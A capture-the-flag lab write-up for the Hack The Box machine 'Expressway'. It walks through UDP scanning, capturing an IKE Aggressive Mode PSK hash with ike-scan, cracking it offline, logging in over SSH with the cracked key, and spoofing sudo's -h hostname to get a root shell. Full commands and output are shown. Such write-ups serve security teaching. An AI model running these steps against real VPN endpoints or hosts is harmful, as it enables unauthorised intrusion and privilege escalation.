HTB: Expressway

Introduction
#

Expressway is a Linux machine that chains together several interesting techniques: IPSec/IKE VPN reconnaissance, offline Pre-Shared Key (PSK) cracking, SSH access via recovered credentials, and privilege escalation through a custom sudo binary that performs hostname-based policy checks.

nmap
#

nmap finds only one open TCP port, SSH (22):

sudo nmap -sC -sV -oA nmap_scan/nmap_results 10.129.72.249

-sC for defaults scripts
-sV enumerate version
-vv double verbose
-oA output in all formats

PORT   STATE SERVICE
22/tcp open  ssh

This left very little to work with from a TCP perspective, so a UDP scan was the logical next step.

sudo nmap -sU --top-ports 100 -Pn -T4 10.129.72.249

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-23 02:25 EDT
Nmap scan report for 10.129.72.249
Host is up (0.019s latency).
Not shown: 91 closed udp ports (port-unreach)
PORT     STATE         SERVICE        VERSION
68/udp   open|filtered dhcpc
69/udp   open|filtered tftp
445/udp  open|filtered microsoft-ds
500/udp  open          isakmp?
| fingerprint-strings: 
|   IKE_MAIN_MODE: 
|_    "3DUfw<
| ike-version: 
|   attributes: 
|     XAUTH
|_    Dead Peer Detection v1.0
593/udp  open|filtered http-rpc-epmap
1023/udp open|filtered unknown
1719/udp open|filtered h323gatestat
4444/udp open|filtered krb524
4500/udp open|filtered nat-t-ike
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port500-UDP:V=7.94SVN%I=7%D=9/23%Time=68D23DD8%P=x86_64-pc-linux-gnu%r(
SF:IKE_MAIN_MODE,70,"\0\x11\"3DUfw<\xa3V\x17\xd0\xc2\xe7h\x01\x10\x02\0\0\
SF:0\0\0\0\0\0p\r\0\x004\0\0\0\x01\0\0\0\x01\0\0\0\(\x01\x01\0\x01\0\0\0\x
SF:20\x01\x01\0\0\x80\x01\0\x05\x80\x02\0\x02\x80\x04\0\x02\x80\x03\0\x01\
SF:x80\x0b\0\x01\x80\x0c\0\x01\r\0\0\x0c\t\0&\x89\xdf\xd6\xb7\x12\0\0\0\x1
SF:4\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\0")%r(IPSEC_START,9C,
SF:"1'\xfc\xb08\x10\x9e\x89\xf0\x91\xe9\tR\x92\x10p\x01\x10\x02\0\0\0\0\0\
SF:0\0\0\x9c\r\0\x004\0\0\0\x01\0\0\0\x01\0\0\0\(\x01\x01\0\x01\0\0\0\x20\
SF:x01\x01\0\0\x80\x01\0\x05\x80\x02\0\x02\x80\x04\0\x02\x80\x03\0\x03\x80
SF:\x0b\0\x01\x80\x0c\x0e\x10\r\0\0\x0c\t\0&\x89\xdf\xd6\xb7\x12\r\0\0\x14
SF:\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\0\r\0\0\x18@H\xb7\xd5n
SF:\xbc\xe8\x85%\xe7\xde\x7f\0\xd6\xc2\xd3\x80\0\0\0\0\0\0\x14\x90\xcb\x80
SF:\x91>\xbbin\x08c\x81\xb5\xecB{\x1f");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 284.81 seconds

The UDP scan revealed several interesting ports.

Port 500 is the key finding here, it is used for IKEv1/IKEv2 VPN negotiation, part of the IPSec suite.

The Nmap fingerprint confirmed the service was responding to IKE Main Mode and IPSEC_START probes, indicating an active VPN endpoint.

IKE Enumeration
#

Identifying the IKE Configuration
#

With an IKE service on port 500, the next step was to use ike-scan to probe the endpoint and identify its supported parameters and identity.

I initiated an Aggressive Mode handshake, which is significant because Aggressive Mode transmits the identity and hash in plaintext making it far less secure than Main Mode:

└─$ sudo ike-scan -A 10.129.72.249
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.72.249   Aggressive Mode Handshake returned HDR=(CKY-R=7cf96b680236cbb8) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)

Ending ike-scan 1.9.6: 1 hosts scanned in 0.029 seconds (34.11 hosts/sec).  1 returned handshake; 0 returned notify

The peer identity (ID) is ike@expressway.htb - this is the username/FQDN used for IKE authentication.
Authentication is via Pre-Shared Key (PSK)
The encryption suite uses 3DES + SHA1
XAUTH is supported. This is an additional username/password layer on top of IPSec sometimes used to authenticate individual users.

I added the hostname expressway.htb to /etc/hosts

Capturing the PSK Hash
#

Because I used the aggressive mode, ike-scan captured authentication hash from the handshake, which I can then crack offline.

The -Pike.psk flag told ike-scan to save the PSK material to a file:

└─$ sudo ike-scan -A 10.129.72.249 --id=ike@expressway.htb -Pike.psk

The resulting ike.psk file contains the captured hash data in a format that psk-crack can parse.

└─$ cat ike.psk  
e7071ac54d358dc555eae2cb797a798fb1f706279e36bfd704167b8341b906d02695afde6d60b0916ef5bba2520618e340056be48d4913566f46b3c5ac05827139de8f7432378bb1a246bb241006fc9dfbdd1a4b97959dadb474b1f8cf8e5460d6ab575c21ca784cb73131c8643588190c0dea2c66c722dd7b7a8005f301901a:a7dc6ee94fe68c7c769634ecc6ec79786f90dfde53c2c61cae761ec59026838bb70f70b44e1a4420ddfa4fe5202d841a5dae9b414d796cca25a7599c37e0d7f27c0072816c8734c89ef788a9f9a0baf84bafbd3816dd52b6dff02c6de5def5eb83901d48a057470488f28c34aff5ef8768614b4e6890a51f2872a95cccb1605e:5f4a4702967821c4:832b4c72e7883b8a:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:195edad776bb6d3b50b48e61bb76341efa55889c:99d2ceead1b74dab1bc0bc43a88ac961b76ddb08222ea9946ba4ce66d3d8441b:48ff4ac323dc2c0334cc2cc094abd18e81636342

PSK Cracking
#

With the PSK hash captured, I used psk-crack with classic rockyou.txt wordlist:

└─$ psk-crack -d ~/Tools/rockyou.txt ike.psk 
Starting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash 48ff4ac323dc2c0334cc2cc094abd18e81636342
Ending psk-crack: 8045039 iterations in 9.076 seconds (886395.50 iterations/sec)

Recovered PSK: freakingrockstarontheroad

SSH as Ike
#

With this I was able to SSH in as Ike:

└─$ ssh ike@10.129.72.249
	freakingrockstarontheroad

└─$ ike@expressway:~$ id
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)

And grab the user flag.

Notably, ike is a member of the proxy group. Squid proxy logs were readable and revealed internal hostnames - http://offramp.expressway.htb

└─$ ike@expressway:~$ cat /var/log/squid/access.log.1
1753229566.990      0 192.168.68.50 NONE_NONE/000 0 - error:transaction-end-before-headers - HIER_NONE/- -
1753229580.379      0 192.168.68.50 NONE_NONE/000 0 - error:transaction-end-before-headers - HIER_NONE/- -
1753229580.417     15 192.168.68.50 NONE_NONE/400 3896 GET / - HIER_NONE/- text/html
1753229688.847      0 192.168.68.50 NONE_NONE/400 3896 OPTIONS / - HIER_NONE/- text/html
1753229688.847      0 192.168.68.50 NONE_NONE/400 3896 OPTIONS / - HIER_NONE/- text/html
1753229688.847      0 192.168.68.50 NONE_NONE/400 3944 GET /nmaplowercheck1753229281 - HIER_NONE/- text/html
1753229688.847      0 192.168.68.50 NONE_NONE/400 3896 POST / - HIER_NONE/- text/html
1753229688.847      0 192.168.68.50 NONE_NONE/400 3896 GET / - HIER_NONE/- text/html
1753229688.847      0 192.168.68.50 NONE_NONE/400 3926 GET /flumemaster.jsp - HIER_NONE/- text/html
1753229688.847      0 192.168.68.50 NONE_NONE/400 3916 GET /master.jsp - HIER_NONE/- text/html
1753229688.847      0 192.168.68.50 NONE_NONE/400 3896 PROPFIND / - HIER_NONE/- text/html
1753229688.847      0 192.168.68.50 NONE_NONE/400 3914 GET /.git/HEAD - HIER_NONE/- text/html
1753229688.847      0 192.168.68.50 NONE_NONE/400 3926 GET /tasktracker.jsp - HIER_NONE/- text/html
1753229688.847      0 192.168.68.50 NONE_NONE/000 0 - error:transaction-end-before-headers - HIER_NONE/- -
1753229688.902      0 192.168.68.50 NONE_NONE/400 3896 PROPFIND / - HIER_NONE/- text/html
1753229688.902      0 192.168.68.50 NONE_NONE/400 3896 OPTIONS / - HIER_NONE/- text/html
1753229688.902      0 192.168.68.50 NONE_NONE/400 3914 GET /rs-status - HIER_NONE/- text/html
1753229688.902      0 192.168.68.50 TCP_DENIED/403 3807 GET http://www.google.com/ - HIER_NONE/- text/html
1753229688.902      0 192.168.68.50 NONE_NONE/400 3902 POST /sdk - HIER_NONE/- text/html
1753229688.902      0 192.168.68.50 NONE_NONE/400 3896 GET / - HIER_NONE/- text/html
1753229688.902      0 192.168.68.50 NONE_NONE/000 0 - error:transaction-end-before-headers - HIER_NONE/- -
1753229688.902      0 192.168.68.50 TCP_DENIED/403 3807 GET http://offramp.expressway.htb - HIER_NONE/- text/html
1753229689.010      0 192.168.68.50 NONE_NONE/400 3896 OPTIONS / - HIER_NONE/- text/html
1753229689.010      0 192.168.68.50 NONE_NONE/400 3896 XDGY / - HIER_NONE/- text/html
1753229689.010      0 192.168.68.50 NONE_NONE/400 3916 GET /evox/about - HIER_NONE/- text/html
1753229689.058      0 192.168.68.50 NONE_NONE/400 3906 GET /HNAP1 - HIER_NONE/- text/html
1753229689.058      0 192.168.68.50 NONE_NONE/400 3896 PROPFIND / - HIER_NONE/- text/html
1753229689.058      0 192.168.68.50 TCP_DENIED/403 381 HEAD http://www.google.com/ - HIER_NONE/- text/html
1753229689.058      0 192.168.68.50 NONE_NONE/400 3934 GET /browseDirectory.jsp - HIER_NONE/- text/html
1753229689.058      0 192.168.68.50 NONE_NONE/400 3924 GET /jobtracker.jsp - HIER_NONE/- text/html
1753229689.058      0 192.168.68.50 NONE_NONE/400 3916 GET /status.jsp - HIER_NONE/- text/html
1753229689.114      0 192.168.68.50 NONE_NONE/400 3916 GET /robots.txt - HIER_NONE/- text/html
1753229689.114      0 192.168.68.50 NONE_NONE/400 3922 GET /dfshealth.jsp - HIER_NONE/- text/html
1753229689.165      0 192.168.68.50 NONE_NONE/400 3896 OPTIONS / - HIER_NONE/- text/html
1753229689.165      0 192.168.68.50 NONE_NONE/400 3896 GET / - HIER_NONE/- text/html
1753229689.165      0 192.168.68.50 NONE_NONE/400 3918 GET /favicon.ico - HIER_NONE/- text/html
1753229689.222      0 192.168.68.50 TCP_DENIED/403 3768 CONNECT www.google.com:80 - HIER_NONE/- text/html
1753229689.322      0 192.168.68.50 NONE_NONE/400 3896 OPTIONS / - HIER_NONE/- text/html
1753229689.322      0 192.168.68.50 NONE_NONE/400 381 HEAD / - HIER_NONE/- text/html
1753229689.322      0 192.168.68.50 NONE_NONE/400 3896 GET / - HIER_NONE/- text/html
1753229689.475      0 192.168.68.50 NONE_NONE/400 3896 OPTIONS / - HIER_NONE/- text/html
1753229689.526      0 192.168.68.50 NONE_NONE/400 3896 POST / - HIER_NONE/- text/html
1753229689.629      0 192.168.68.50 NONE_NONE/400 3896 OPTIONS / - HIER_NONE/- text/html
1753229689.680      0 192.168.68.50 NONE_NONE/400 3896 OPTIONS / - HIER_NONE/- text/html
1753229689.783      0 192.168.68.50 NONE_NONE/400 3896 OPTIONS / - HIER_NONE/- text/html
1753229689.933      0 192.168.68.50 NONE_NONE/400 3896 OPTIONS / - HIER_NONE/- text/html
1753229690.086      0 192.168.68.50 NONE_NONE/400 3896 OPTIONS / - HIER_NONE/- text/html
1753229719.140      0 192.168.68.50 NONE_NONE/400 3896 GET / - HIER_NONE/- text/html
1753229719.245      0 192.168.68.50 NONE_NONE/400 3896 GET / - HIER_NONE/- text/html
1753229760.700      0 192.168.68.50 NONE_NONE/400 3918 GET /randomfile1 - HIER_NONE/- text/html
1753229760.722      0 192.168.68.50 NONE_NONE/400 3908 GET /frand2 - HIER_NONE/- text/html

Root
#

Starting privilege escalation with standard sudo -l:

└─$ ike@expressway:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

For security reasons, the password you type will not be visible.

Password: 
Sorry, user ike may not run sudo on expressway.

There is nothing I can use, but it returned an interesting non-standard message:

Sorry, user ike may not run sudo on expressway.

I checked the location of the sudo binary:

└─$ ike@expressway:~$ which sudo
/usr/local/bin/sudo

This is not the standard sudo path (/usr/bin/sudo).

It means a custom binary was placed earlier in the PATH, overriding the real sudo. This binary is performing its own access control logic.

Internal Hostname
#

From the Squid proxy access log at /var/log/squid/access.log.1 I have internal hostname:

TCP_DENIED/403 3807 GET http://offramp.expressway.htb - HIER_NONE/- text/html

Exploiting the Custom sudo
#

The sudo binary has a -h flag intended to specify a remote host to run a command on.

The hypothesis was that the custom sudo binary’s access policy was based on the hostname and that it might grant elevated privileges when the host is offramp.expressway.htb.

Since the -h flag is user-supplied, this value was trivially spoofable:

└─$ ike@expressway:/usr/bin$ /usr/local/bin/sudo -h offramp.expressway.htb ./bash

This bypassed the policy check entirely, spawning a root shell:

└─$ root@expressway:/usr/bin# id
uid=0(root) gid=0(root) groups=0(root)

Now just grab the flag and its done!

└─$ root@expressway:~# cat /root/root.txt

Summary
#

UDP Scan → IKE on port 500 (Aggressive Mode)
    ↓
ike-scan → Identity: ike@expressway.htb, Auth: PSK
    ↓
psk-crack + rockyou.txt → "freakingrockstarontheroad"
    ↓
SSH as ike → proxy group → readable Squid logs
    ↓
Squid logs reveal → offramp.expressway.htb
    ↓
Custom /usr/local/bin/sudo → -h flag spoofing
    ↓
root shell

Author

Introduction #

nmap #

IKE Enumeration #

Identifying the IKE Configuration #

Capturing the PSK Hash #

PSK Cracking #

SSH as Ike #

Root #

Internal Hostname #

Exploiting the Custom sudo #

Summary #